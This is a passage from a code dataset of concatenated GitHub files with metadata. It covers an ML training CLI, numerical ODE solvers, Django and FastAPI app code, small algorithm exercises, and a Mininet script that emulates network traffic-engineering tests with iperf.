Can also specify the following shorthands for pre-defined sets of \"\n \"variables: 'all', 'pos', 'vel', 'acc', 'rot' 'omega'.\")\n parser.add_argument(\"-seda\", \"--state_estimate_data_augmentation\", action=\"store_true\",\n help=\"Whether or not to apply data augmentation to the provided state estimates for the\"\n \"DDA architecture (in the form of adding Gaussian noise to the state variables).\")\n\n # arguments related to the model\n parser.add_argument(\"-m\", \"--model_name\", type=str,\n choices=[\"codevilla\", \"c3d\", \"c3d_state\", \"codevilla300\", \"codevilla_skip\",\n \"codevilla_multi_head\", \"codevilla_dual_branch\", \"codevilla_no_state\", \"resnet_state\",\n \"resnet\", \"resnet_larger\", \"resnet_larger_dual_branch\", \"resnet_larger_multi_head\",\n \"resnet_state_larger\", \"resnet_larger_att_ctrl\", \"state_only\", \"dreyeve_branch\",\n \"resnet_att\", \"resnet_larger_gru\", \"ue4sim\", \"dda\", \"high_res_att\", \"simple_att\",\n \"resnet_gaze\", \"resnet_larger_gaze\", \"direct_supervision\"],\n help=\"The name of the model to use.\")\n parser.add_argument(\"-mlp\", \"--model_load_path\", type=str, # TODO: maybe adjust for dreyeve net\n help=\"Path to load a model checkpoint from (including information about the \"\n \"architecture, the current weights and the state of the optimiser).\")\n parser.add_argument(\"-nca\", \"--no_control_activation\", action=\"store_true\",\n help=\"Whether or not to use an activation function for the output of the control \"\n \"prediction network (currently using sigmoid for thrust and tanh for body rates).\")\n parser.add_argument(\"-ga\", \"--gaze_activation\", action=\"store_true\",\n help=\"Whether or not to use an activation function (tanh) \"\n \"for the output of the gaze prediction networks.\")\n parser.add_argument(\"-csf\", \"--channel_scale_factor\", type=int,\n help=\"Factor by which to scale the number of channels for the high-resolution attention model.\")\n parser.add_argument(\"-hra\", \"--high_res_activation\", action=\"store_true\",\n help=\"Whether or not to activate the attention output of the \"\n \"High-Res-Attention network (using hard tanh).\")\n\n # arguments related to training\n parser.add_argument(\"-md\", \"--mode\", type=str, choices=[\"train\", \"cv\", \"val\", \"test\"],\n help=\"Mode to train in, currently only 'normal' training and cross validation.\")\n parser.add_argument(\"-g\", \"--gpu\", type=int,\n help=\"GPU to use for training if any are available.\")\n parser.add_argument(\"-ts\", \"--torch_seed\", type=int,\n help=\"Random seed to use for calling torch.manual_seed(seed).\")\n parser.add_argument(\"-w\", \"--num_workers\", type=int,\n help=\"Number of workers to use for loading the data.\")\n parser.add_argument(\"-b\", \"--batch_size\", type=int,\n help=\"Batch size to use for training.\")\n parser.add_argument(\"-e\", \"--num_epochs\", type=int,\n help=\"Maximum number of epochs to train for.\")\n parser.add_argument(\"-o\", \"--optimiser\", type=str, choices=[\"adam\"],\n help=\"The optimiser to use.\")\n parser.add_argument(\"-lr\", \"--learning_rate\", type=float,\n help=\"The learning rate to start with.\")\n parser.add_argument(\"-l\", \"--losses\", type=str, nargs=\"+\",\n help=\"The loss to use. Depends on the model architecture and what kinds of outputs \"\n \"(and how many) it has. For now only one loss can be specified (no architecture \"\n \"with multiple outputs/losses). 
If the wrong loss is supplied, it will be changed \"\n \"automatically to the default loss for a given architecture/output type.\")\n\n # arguments related to logging information\n parser.add_argument(\"-lg\", \"--log_root\", type=str,\n help=\"Root directory where log folders for each run should be created.\")\n parser.add_argument(\"-exp\", \"--experiment_name\", type=str,\n help=\"The name under which to save the logs and checkpoints (in addition to a timestamp).\")\n parser.add_argument(\"-vf\", \"--validation_frequency\", type=int,\n help=\"How often to compute the validation loss during each epoch. When set to 1 \"\n \"(the default value) this is only done at the end of the epoch, as is standard.\")\n parser.add_argument(\"-cf\", \"--checkpoint_frequency\", type=int,\n help=\"Frequency at which to save model checkpoints (in epochs).\")\n\n # parse the arguments\n arguments = parser.parse_args()\n\n # train\n main(parse_config(arguments))\n","repo_name":"uzh-rpg/VAPAR","sub_path":"gazesim/gazesim/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15018481060","text":"from Euler import euler_method\r\nimport math\r\n\r\n\r\ndef euler_caushy(function=None, y0=None, a_b=None, n=None):\r\n if function is None or y0 is None or a_b is None or n is None:\r\n euler = euler_method()\r\n function = euler[0]\r\n table_euler = euler[1]\r\n else:\r\n table_euler = euler_method(function, y0, a_b, n)[1]\r\n\r\n a = table_euler[0][1]\r\n b = table_euler[-1][1]\r\n n = len(table_euler) - 1\r\n h = (b - a) / n\r\n\r\n yzuv = table_euler[0][2:]\r\n yzuv = list(yzuv)\r\n x0 = a\r\n\r\n answer_list = [(0, x0, *yzuv)]\r\n g = len(yzuv)\r\n while len(yzuv) < 4:\r\n yzuv.append(None)\r\n\r\n f1, f2, f3, f4 = [None] * 4\r\n f = [f1, f2, f3, f4]\r\n new_f1, new_f2, new_f3, new_f4 = [None] * 4\r\n new_f = [new_f1, new_f2, new_f3, new_f4]\r\n yi, zi, ui, vi = [None] * 4\r\n k = [yi, zi, ui, vi]\r\n\r\n for i in range(1, n+1):\r\n x, y, z, u, v = x0, *yzuv\r\n\r\n for j in range(g):\r\n f[j] = eval(function[j])\r\n\r\n new_yzuv = yzuv\r\n new_yzuv[0:g] = table_euler[i][2:]\r\n x, y, z, u, v = x0+h, *new_yzuv\r\n for j in range(g):\r\n new_f[j] = eval(function[j])\r\n\r\n for j in range(g):\r\n k[j] = yzuv[j] + (h/2) * (f[j] + new_f[j])\r\n yzuv[j] = k[j]\r\n\r\n x0 += h\r\n answer_list.append((i, x0, *k[0:g]))\r\n\r\n return answer_list\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(euler_caushy())\r\n\r\n","repo_name":"SMALA-comand/Differential_equations","sub_path":"Euler_Caushy.py","file_name":"Euler_Caushy.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71189276946","text":"from . 
import errors, crud\n\n\ndef get_variant_list(query_params):\n data = crud.get_vcf_data()\n if query_params.ID:\n data = data.query(f'ID == \"{query_params.ID}\"')\n prev_page = query_params.page - 1\n cur_page = query_params.page\n result = []\n values = data.values\n if len(values) > prev_page*10:\n for i in range(prev_page*10, cur_page*10):\n if i > len(values) - 1:\n break\n result.append({\n \"CHROM\": values[i][0].strip(),\n \"POS\": values[i][1],\n \"ID\": values[i][2].strip(),\n \"REF\": values[i][3].strip(),\n \"ALT\": values[i][4].strip(),\n })\n if not result:\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n return result\n\n\ndef create_variant(variant):\n data = crud.get_vcf_data()\n record = crud.create_record(variant)\n data = data.append(record, ignore_index=True)\n crud.save_data(data)\n\n\ndef edit_variant(ID, variant):\n data = crud.get_vcf_data()\n if not len(data.loc[data['ID'] == ID]):\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n cols = [\"CHROM\", \"POS\", \"ID\", \"REF\", \"ALT\"]\n variant_dict = variant.dict()\n for i in range(5):\n data.loc[data['ID'] == ID, data.columns[i]] = variant_dict[cols[i]]\n crud.save_data(data)\n\n\ndef delete_variant(ID):\n data = crud.get_vcf_data()\n if not len(data.loc[data['ID'] == ID]):\n raise errors.JsonException(\n message=errors.NO_VARIANTS_FOUND, code=404)\n data.drop(list(data.loc[data['ID'] == ID].index), axis=0, inplace=True)\n crud.save_data(data)\n","repo_name":"ETsagkaris/saphetorProject","sub_path":"backend/app/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8018127140","text":"#!/bin/python3\n\nif __name__ == \"__main__\":\n # Compute the 3 x 3 determinant of the system\n # Determinant = 0, when system of equations has *NO SOLUTIONS*\n det = lambda a: a*(2*a - 1) - 1*(a - 2) + 2*(1 - 4)\n \n # Hold all possible alpha values\n lst = list()\n \n # Loop through several values that make det = 0\n for i in range(-100, 101):\n if det(i) == 0:\n lst += [i]\n \n # Return the minimum value\n print(min(lst))\n","repo_name":"Chukwudebelu/HackerRank","sub_path":"Mathematics/Linear_Algebra_Foundations/Linear_Algebra_Foundations_#8-Systems_of_Equations/Foundations8SystemsOfEquations1.py","file_name":"Foundations8SystemsOfEquations1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"72549651345","text":"from django.contrib import admin\nfrom .models import TelegramCommands, CommandStatistics, BotAnswers\nfrom django.db.models import Count\n\n\n@admin.register(TelegramCommands)\nclass TelegramCommandsAdmin(admin.ModelAdmin):\n list_display = (\n 'username', 'message', 'date', 'chat'\n )\n readonly_fields = ('username',)\n list_display_links = ('message',)\n search_fields = ('username', 'message')\n list_filter = ('username', 'chat')\n empty_value_display = '-пусто-'\n\n\n@admin.register(CommandStatistics)\nclass CommandStatisticsAdmin(admin.ModelAdmin):\n list_display = ('command_name', 'call_count')\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def get_queryset(self, request):\n unique_commands = TelegramCommands.objects.values(\n 'message'\n ).annotate(\n 
count=Count('username')\n ).order_by('-count')\n\n for command in unique_commands:\n command_name = command['message']\n call_count = command['count']\n command_stat, created = CommandStatistics.objects.get_or_create(\n command_name=command_name,\n defaults={'call_count': call_count}\n )\n if not created:\n command_stat.call_count = call_count\n command_stat.save()\n\n return CommandStatistics.objects.all()\n\n\n@admin.register(BotAnswers)\nclass BotAnswersAdmin(admin.ModelAdmin):\n list_display = (\n 'username', 'response', 'date'\n )\n readonly_fields = ('username',)\n search_fields = ('username',)\n list_filter = ('username',)\n empty_value_display = '-пусто-'\n","repo_name":"avnosov3/NewsWeatherFeed","sub_path":"dashboard/web/telegram/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12464842399","text":"import json\n\nfrom django.core.management import BaseCommand\nfrom recipes.models import Ingredient\n\n\nclass Command(BaseCommand):\n help = 'Загрузка ингредиентов в БД'\n\n def handle(self, *args, **options):\n with open(\n './data/ingredients.json',\n encoding='utf-8'\n ) as data:\n for row in json.load(data):\n ingredient = Ingredient(\n name=row['name'].capitalize(),\n measurement_unit=row['measurement_unit']\n )\n ingredient.save()\n","repo_name":"Andrey11995/foodgram-project-react","sub_path":"backend/recipes/management/commands/load_ingredients.py","file_name":"load_ingredients.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73600697106","text":"import logging\n\nfrom treestump.formatter import TreestumpFormatter\n\n\nclass TreestumpLogger:\n def __init__(self, app_name: str, event_log_formatter_cls=None):\n \"\"\"\n Creates the TreestumpLogger instance, using a custom formatter. The default is `TreestumpFormatter`. Any argument that overrides this default must be a subclass of `TreestumpFormatter`. If it is not, `TreestumpFormatter` will be used instead.\n\n @param app_name: The name of the application where the logger is being used\n @type app_name: str\n @debug_mode: (Optional) Defaults to False\n @type debug_mode: bool\n @param event_log_formatter_cls: (Optional) Log formatter for the class. Defaults to `TreestumpFormatter`. Any custom formatters should inherit from `TreestumpFormatter`.\n \"\"\"\n self.app_name = app_name\n if event_log_formatter_cls:\n try:\n assert issubclass(event_log_formatter_cls, TreestumpFormatter)\n self._event_log_formatter_cls = event_log_formatter_cls\n except AssertionError:\n self.event_log_formatter_cls = TreestumpFormatter\n else:\n self.event_log_formatter_cls = TreestumpFormatter\n\n self._logger = self._configure_logger()\n\n def __repr__(self):\n return f\"TreestumpLogger for application '{self.app_name}'\"\n\n def log(self, message: str, level=20, *args, **kwargs):\n \"\"\"\n @param message: The human-readable message to log\n @type message: str\n @param args: Additional arguments to pass to the logger\n @type args: list\n @param kwargs: Additional keyword arguments to pass to the logger\n @type kwargs: dict\n \"\"\"\n # If no level is specified, log at 20: INFO\n self._logger.log(level, message, *args, **kwargs)\n\n def _configure_logger(self):\n \"\"\"\n Configures the Python logger. 
This retreives or creates a specially-named logger where the handler is an instance of `logging.StreamHandler` and the formatter is an instance of `TreestumpFormatter`\n\n @return: The configured Python logger\n @rtype: logging.Logger\n \"\"\"\n # Create (or retrieve) a logger named by our template and app_name\n logger = logging.getLogger(f\"{self.app_name}_event_logger\")\n\n # Set log level threshold\n logger.setLevel(logging.INFO)\n\n # Create a new logging.StreamHandler() and set our defined formatter on the handler\n handler = logging.StreamHandler()\n handler.setFormatter(self.event_log_formatter_cls(self.app_name))\n logger.addHandler(handler)\n\n return logger\n","repo_name":"thejessleigh/treestump","sub_path":"treestump/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44010079802","text":"# 只出现一次的数字:除了一个��字出现一次,其他都出现了三次,找出这个数\n\n# 对于出现三次的数字,各二进制位出现的次数都是3的倍数,对3求余,结果为只出现一次的数字\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n counts = [0] * 32\n for num in nums:\n for j in range(32):\n # 获取二进制最后一位\n counts[j] += num & 1\n # 右移,循环获取num所有位的值\n num >>= 1\n res, m = 0, 3\n # 将counts数组中各二进制位的值恢复到数字res上\n for i in range(32):\n res <<= 1\n res |= counts[31 - i] % m\n # 对于负数要特殊操作\n return res if counts[31] % m == 0 else ~(res ^ 0xffffffff)","repo_name":"wxmsummer/algorithm","sub_path":"leetcode/offer/offer56-3_singleNumbers.py","file_name":"offer56-3_singleNumbers.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4086095102","text":"import csv\n\nfrom django.core.management import BaseCommand\n\nfrom recipes.models import Ingredient\n\n\nclass Command(BaseCommand):\n \"\"\"\n Наполнение базы данных данными из ingredients.csv.\n Команда - pyhton manage.py fill_db.\n \"\"\"\n def handle(self, *args, **options):\n\n file_path = 'data/ingredients.csv'\n print('Загрузка началась')\n\n with open(file_path, 'r', encoding='utf-8') as csv_file:\n ingredients = csv.reader(csv_file)\n\n for row in ingredients:\n name, measurement_unit = row\n Ingredient.objects.get_or_create(\n name=name,\n measurement_unit=measurement_unit\n )\n\n print('Загрузка успешно завершена')\n","repo_name":"AndrewNemz/foodgram-project-react","sub_path":"backend/recipes/management/commands/fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27125772800","text":"#!/usr/bin/python\n\n\"\"\" Emulation framework entry script that initiates and runs a TE swap-over\nperformance test on a topology with a sepecific controller.\n\nUsage:\n sudo ./EmulateTE.py --topo --controller --scenario \\\n --sw_ctrl_map [map] --ctrl_options [ctrl_opts] \\\n --config_file [config_file]\n\n - Topology module to use for the emulation\n - Name of the controller to use. See 'controllers_te.yaml' for\n list of supported names. Note, start command of YMAL file is ignored\n - Path to scenario YAML file that defines experiment behaivour\n [map] - Swith-controller map. 
Using this attribute will initiate multiple\n        controllers and instances (as per the map details).\n    [ctrl_opts] - Netem attributes to apply to the control channel to modify\n        characteristics of switch-to-controller communication.\n    [log_level] - Optional emulator logging level (debug, info, warning,\n        error, critical). Defaults to critical.\n    [ctrl_log_level] - Optional controller logging level (debug, info, warning,\n        error, critical). Defaults to critical.\n    [config_file] - Optional configuration file to use for emulator. Specifies\n        start command and other config attributes. Defaults to\n        \"EmulatorConfigs/config.TE.yaml\".\n\"\"\"\n\nimport os\nimport time\nimport subprocess\nimport shutil\nimport importlib\nimport traceback\nfrom argparse import ArgumentParser\n\n# Mininet imports\nfrom mininet.log import setLogLevel, info, lg\n\n# Config file loading and switch state check\nimport json\nimport yaml\nfrom tools.StateMatches import StateWaitTimeoutException, wait_match\n\n# Shared method imports\nfrom emulator_base import load_ctrls, get_ctrl_names, get_ctrl_module\nfrom emulator_base import path_to_import_notation\nfrom emulator_base import signal_subprocess\nfrom emulator_base import prepare_check_dict\nfrom emulator_base import ControllerManager\nfrom emulator_base import running_instance_check\n\n\n# Dictionary that contains information about available controllers.\n# XXX NOTE: The 'start_command' attribute is used to find the module for the\n# required controller. We assume that the module is located as the second item\n# in the list (index 1). All other attributes of the command are ignored!\nCONTROLLERS = {}\n\n# Template for the iperf stream script used to generate traffic for the experiment\nIPERF_GEN_SCRIPT_TMPL = \"\"\"#!/bin/bash\n\nsleep %s;\niperf -c %s -u -b %s -t %s;\necho 'DONE' > %s.done\n\"\"\"\n\n# Template used to generate gnuplot script to make graphs for viewing results\nGNUPLOT_SCRIPT_TMPL = \"\"\"set datafile separator ','\nset autoscale\nunset log\nset xtic 5\nset ytic 5\nset title 'Congestion Minimisation Performance'\nset xlabel 'Time (seconds)'\nset ylabel 'Packet Loss (%%)'\nset term png\nset output '%s'\nset bmargin %s\nset key box below\n\nset grid ytics lc rgb '#bbbbbb' lw 1 lt 0\nset grid xtics lc rgb '#bbbbbb' lw 1 lt 0\n\nplot \\\\\n\"\"\"\n\nGNUPLOT_SERIES_TMPL = \"\"\"    '%s' using %s title '%s' with linespoints\"\"\"\n\n# Dictionary that defines the TE optimisation test scenario that needs to be\n# emulated (i.e. host send rates and times)\nSCENARIO = {}\n\"\"\" Format:\n{\"scenario_name\": , \"usable_on_topo\": [, ...], \"scenario\": {\n    : {\n        \"send\": [\n            {\n                \"src_host\": , \"dest_addr\": ,\n                \"rate\": , \"delay\": \n            },\n            ...\n        ],\n        \"receive\": [{\"host\": }, ...]\n    }, ...}\n}\n\n represents the name of the controller the scenario applies to while the\n'send' attribute defines the amount of traffic () a host () is\nsending to a destination receiver (). 
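For instance (illustrative values only), a send entry {\"src_host\": \"h1\", \"dest_addr\": \"10.0.0.2\", \"rate\": \"10M\", \"delay\": 5} asks host h1 to push a 10 Mbit/s iperf UDP stream towards 10.0.0.2 starting 5 seconds into the run. 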
The 'receive' list defines all\nthe hosts that will act as iperf servers (receivers).\n\"\"\"\n\n# Running topology module information\ntopo = None\n# Controller manager instance\ncontrollers = None\n# Running network instance\nnet = None\n\ndef load_scenario(file):\n    \"\"\" Load the TE emulation scenario from a YAML file `file` and return it.\n\n    Args:\n        file (str): Path to TE scenario YAML file.\n\n    Returns:\n        dict: TE scenario information dictionary\n    \"\"\"\n    with open(file, \"r\") as stream:\n        return yaml.safe_load(stream)\n\ndef validate_scenario(scen, ctrl, topo):\n    \"\"\" Validate a TE scenario `scen` from the controller `ctrl`. Ensure that\n    the scenario specifies valid senders and receivers as defined by the topology\n    `topo`.\n\n    Note:\n        This method will modify the scenario by over-writing the top-level\n        dictionary of controllers (key 'scenario') with the controller we\n        are using for emulation `ctrl`.\n\n    Args:\n        scen (dict): TE scenario information dictionary\n        ctrl (str): Name of controller to validate scenario info for\n        topo (obj): Topology module to use for validation\n\n    Raises:\n        Exception: Scenario file is invalid\n    \"\"\"\n    # Make sure the controller exists in the scenario file\n    if ctrl not in scen[\"scenario\"]:\n        raise Exception(\"Invalid scenario. Controller %s not found!\" % ctrl)\n\n    # Remove redundant controller scenario info\n    scen[\"scenario\"] = scen[\"scenario\"][ctrl]\n    scen = scen[\"scenario\"]\n\n    # Check if the stream time exists in the config\n    if \"stream_time\" not in scen:\n        raise Exception(\"Invalid scenario: Scenario has no stream time field\")\n    else:\n        if int(scen[\"stream_time\"]) <= 0:\n            raise Exception(\"Invalid scenario: Stream time not positive int\")\n\n    # Check that the attributes are correct\n    for s in scen[\"send\"]:\n        if (\"src_host\" not in s or \"dest_addr\" not in s or \"rate\" not in s\n                or \"delay\" not in s):\n            raise Exception(\"Invalid scenario: Send info has missing fields\")\n        if s[\"delay\"] < 0:\n            raise Exception(\"Invalid scenario: Send delay not positive float\")\n        stream_time = scen[\"stream_time\"]\n        if stream_time < s[\"delay\"]:\n            raise Exception(\"Invalid scenario: Send delay > stream time\")\n        if not s[\"src_host\"] in topo.hosts():\n            raise Exception(\"Invalid scenario: Send host doesn't exist\")\n\n    for r in scen[\"receive\"]:\n        if \"host\" not in r:\n            raise Exception(\"Invalid scenario: Receive info has missing fields\")\n        if not r[\"host\"] in topo.hosts():\n            raise Exception(\"Invalid scenario: Receive host doesn't exist\")\n\ndef cleanup():\n    \"\"\" Clean used resources by terminating running network, controller or host\n    process instances. 
Method should be called on an error or when the emulation\n    has finished.\n    \"\"\"\n    global net\n    global controllers\n\n    # Tell the controller manager to stop any running instances\n    if controllers is not None:\n        controllers.stop()\n        controllers = None\n\n    if net is not None:\n        # Stop the LLDP packet generators\n        for h in topo.hosts_attr(net):\n            host = net.get(h[0])\n            signal_subprocess(host, \"LLDP/lldp_host.py\", kill=True)\n\n        # Stop the iperf traffic generators and receivers\n        for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n            s = SCENARIO[\"scenario\"][\"send\"][i]\n            host = net.get(s[\"src_host\"])\n            info(\"Stopped iperf stream script on host %s\\n\" % s[\"src_host\"])\n            signal_subprocess(host, \"bash st%s.sh\" % i, kill=True)\n\n        for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n            r = SCENARIO[\"scenario\"][\"receive\"][i]\n            host = net.get(r[\"host\"])\n            info(\"Stopped iperf server on host %s\\n\" % r[\"host\"])\n            signal_subprocess(host, \"iperf -s\", kill=True)\n\n        # Stop the network\n        net.stop()\n        net = None\n\ndef run(controller_name):\n    \"\"\" Start and run the emulation experiment to record TE swap-over\n    performance by looking at sustained congestion/loss rates when links are\n    constrained and sufficient traffic is placed on them to generate congestion\n    loss. This emulation test uses iperf senders and receivers to generate\n    traffic on the topology. All sustained congestion intervals are printed to\n    standard output on single lines with format ',,'\n    where  represents the iperf stream ID, the start time (in\n    seconds) when congestion was first observed and the end time (in\n    seconds) when congestion loss stopped (loss % reached 0). In addition to the\n    numeric results, graphs of congestion loss % vs time are saved in files\n    named 'graph_.png' where  represents the index number\n    of the iperf server (receiver) from the scenario file.\n\n    If an error occurs, a single line is printed to standard output in format\n    'ERROR!,'. Extra information such as stack traces, task lists and\n    flow/group table dumps are output using the mininet logger (written to\n    error out) with a critical logging level.\n\n    Note:\n        Similar to 'EmulateLinkFailure.py', the test waits for the switches to\n        be in a specific state before starting the experiment. 
The expected\n        state is defined in the 'WaitState' directory by a JSON file with the\n        name '..json'.\n\n    Args:\n        controller_name (str): Name of controller to use\n    \"\"\"\n    # Create the stream iperf scripts to run and clear the done indicator\n    # files of the scripts\n    for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n        s = SCENARIO[\"scenario\"][\"send\"][i]\n        t = s[\"delay\"] + 1\n        end_t = SCENARIO[\"scenario\"][\"stream_time\"] - s[\"delay\"]\n        fname = \"st%s\" % i\n        with open(\"%s.sh\" % fname, \"w\") as f:\n            f.write(IPERF_GEN_SCRIPT_TMPL % (t, s[\"dest_addr\"], s[\"rate\"], end_t, fname))\n\n        open(\"%s.done\" % fname, \"w\").close()\n\n    # Tell the hosts to start generating LLDP packets\n    time.sleep(1)\n    for h in topo.hosts_attr(net):\n        host = net.get(h[0])\n        host.cmd(\"LLDP/lldp_host.py %s %s &\" % (h[1], h[2]))\n\n    # Wait for the switches to start-up with the correct state\n    try:\n        check_dict = {}\n        with open(\"WaitState/%s.%s.json\" % (controller_name, topo.name), \"r\") as data_file:\n            check_dict = json.load(data_file)\n        prepare_check_dict(check_dict)\n        wait_match(check_dict, timeout=30)\n    except StateWaitTimeoutException:\n        # If we time out write an error message, dump the flows and clean-up\n        print(\"ERROR!,Network state took too long to stabilise, exiting ...\")\n        lg.critical(\"%s\\n\" % subprocess.check_output([\"ps\", \"-aux\"]))\n\n        # Dump the flow rules (and groups if not reactive controller)\n        topo.dump_tables(dump_groups=False if controller_name == \"reactive\" else True)\n\n        # Cleanup and exit\n        cleanup()\n        return\n\n    info(\"Topology has stabilised, running iperf test\\n\")\n\n    for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n        r = SCENARIO[\"scenario\"][\"receive\"][i]\n        info(\"RECV %s %s\\n\" % (i, r[\"host\"]))\n        host = net.get(r[\"host\"])\n        host.cmd(\"iperf -s -u -i 1 > TE_OUT_%s.txt &\" % i)\n\n    for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n        s = SCENARIO[\"scenario\"][\"send\"][i]\n        info(\"SEND %s %s\\n\" % (i, s[\"src_host\"]))\n        fname = \"st%s.sh\" % i\n        host = net.get(s[\"src_host\"])\n        host.cmd(\"bash %s &\" % fname)\n\n    # Wait for the iperf stream senders to finish sending data\n    stream_done = []\n    for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n        stream_done.append(False)\n\n    timed_out = True\n    for wait in range(1, 120):\n        bool_all_done = True\n        for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n            if stream_done[i] == False:\n                bool_all_done = False\n                with open(\"st%s.done\" % i, \"r\") as f:\n                    if f.readline().rstrip() == \"DONE\":\n                        stream_done[i] = True\n\n        if bool_all_done:\n            timed_out = False\n            break\n\n        time.sleep(1)\n\n    if timed_out:\n        lg.critical(\"Iperf Stream did not terminate in time\\n\")\n\n    info(\"Finished iperf, cleaning up and computing results\\n\")\n\n    # Cleanup, process results and remove temp and generated files\n    cleanup()\n    for i in range(len(SCENARIO[\"scenario\"][\"receive\"])):\n        try:\n            proc_iperf_data(i)\n            os.remove(\"TE_OUT_%s.txt\" % i)\n        except Exception as ex:\n            lg.critical(\"Error processing iperf data of receiver %s: %s\\n\"\n                            % (i, ex))\n            continue\n\n    for i in range(len(SCENARIO[\"scenario\"][\"send\"])):\n        os.remove(\"st%s.sh\" % i)\n        os.remove(\"st%s.done\" % i)\n\ndef proc_iperf_out(line):\n    \"\"\" Process an iperf server interval output line. Method returns a\n    packed tuple of the fields in an iperf -s line when the interval is\n    set to 1. 
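For example (illustrative), the already-stripped line '2.0- 3.0 sec  1.25 MBytes  10.5 Mbits/sec  0.004 ms  0/  893 (0%)' parses to (2.0, 3.0, '1.25 mBytes', '10.5 mbits/sec', '0.004 ms', '0%') after the internal lower-casing. 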
If the line is not an interval entry, None is returned.\n\n    Args:\n        line (str): Line to extract fields from\n    Returns:\n        packed tuple: time_left, time_right, size, rate, delay, loss or None if\n            `line` is not a valid interval line.\n    \"\"\"\n    time_left = None\n    time_right = None\n    size = None\n    rate = None\n    delay = None\n    loss = None\n\n    line_unproc = line.lower()\n    if \"sec\" in line_unproc:\n        line_unproc = line_unproc.split(\" sec\")\n\n        time = line_unproc[0]\n        line_unproc = line_unproc[1].strip()\n\n        time_left = float(time.split(\"-\")[0].strip())\n        time_right = float(time.split(\"-\")[1].strip())\n    else:\n        return None\n\n    if \"bytes\" in line_unproc:\n        line_unproc = line_unproc.split(\"bytes\")\n\n        size = line_unproc[0]+\"Bytes\"\n        line_unproc = line_unproc[1].strip()\n    else:\n        return None\n\n    if \"bits/sec\" in line_unproc:\n        line_unproc = line_unproc.split(\"bits/sec\")\n\n        rate = line_unproc[0] + \"bits/sec\"\n        line_unproc = line_unproc[1].strip()\n    else:\n        return None\n\n    if \"ms\" in line_unproc:\n        line_unproc = line_unproc.split(\"ms\")\n        delay = line_unproc[0] + \"ms\"\n        line_unproc = line_unproc[1].strip()\n    else:\n        return None\n\n    if \"%\" in line_unproc:\n        line_unproc = line_unproc.split(\"(\")\n        loss = line_unproc[1].split(\")\")[0]\n    else:\n        return None\n\n    if (time_right - time_left) > 1:\n        # Skip the total line\n        return None\n\n    return (time_left, time_right, size, rate, delay, loss)\n\ndef proc_iperf_data(server_index):\n    \"\"\" Process through the iperf server output to generate the TE recovery\n    time graph. Method will iterate through 'TE_OUT_%s.txt' (indexed by\n    `server_index`) created by the iperf server and create a gnuplot file which\n    is then used to make the graph for this execution in file 'graph_%s.png'.\n    \"\"\"\n    stream_id = []\n    stream_data = {}\n\n    # Split the iperf server file by streams\n    with open(\"TE_OUT_%s.txt\" % server_index) as f:\n        for line in f.readlines():\n            line = line.strip()\n            if line.startswith(\"[\"):\n                if \"]\" not in line:\n                    continue\n\n                ID = line.split(\"]\")\n                data = ID[1].strip()\n                ID = ID[0][1:].strip()\n                if ID.isdigit() == False:\n                    continue\n\n                if ID not in stream_id:\n                    stream_id.append(ID)\n                if ID not in stream_data:\n                    stream_data[ID] = []\n\n                stream_data[ID].append(data)\n\n    # Consolidate the streams into one line of data and work out start and end of congestion\n    stream_congestion = {}\n    for ID in stream_id:\n        stream_congestion[ID] = {\"start\": None, \"end\": None}\n\n    proc_data = {}\n    index = 0\n    for ID in stream_id:\n        ST_START_DELAY = SCENARIO[\"scenario\"][\"send\"][index][\"delay\"]\n        index += 1\n        for line in stream_data[ID]:\n            res = proc_iperf_out(line)\n            if res is not None:\n                tmp = \"%s\" % \",\".join(map(str, res[2:]))\n                tup = (res[0]+ST_START_DELAY, res[1]+ST_START_DELAY)\n                if tup not in proc_data:\n                    proc_data[tup] = {}\n\n                proc_data[tup][ID] = tmp\n\n                # Try to find the start and the end of the congestion\n                if stream_congestion[ID][\"start\"] is None and float(res[5][:-1]) > 1:\n                    stream_congestion[ID][\"start\"] = res[0]+ST_START_DELAY\n                elif (stream_congestion[ID][\"start\"] is not None and\n                        stream_congestion[ID][\"end\"] is None and\n                        float(res[5][:-1]) < 1):\n                    stream_congestion[ID][\"end\"] = res[0]+ST_START_DELAY\n\n    # Output data that needs to be plotted by gnuplot\n    with open(\"out_%s.dat\" % server_index, \"w\") as f:\n        for key in sorted(proc_data.keys()):\n            dat = proc_data[key]\n            f.write(\"%s,%s,\" % (key[0], key[1]))\n            skipped = False\n            for ID in stream_id:\n                if skipped:\n                    f.write(\",\")\n                else:\n                    skipped = True\n\n                if ID in dat:\n                    
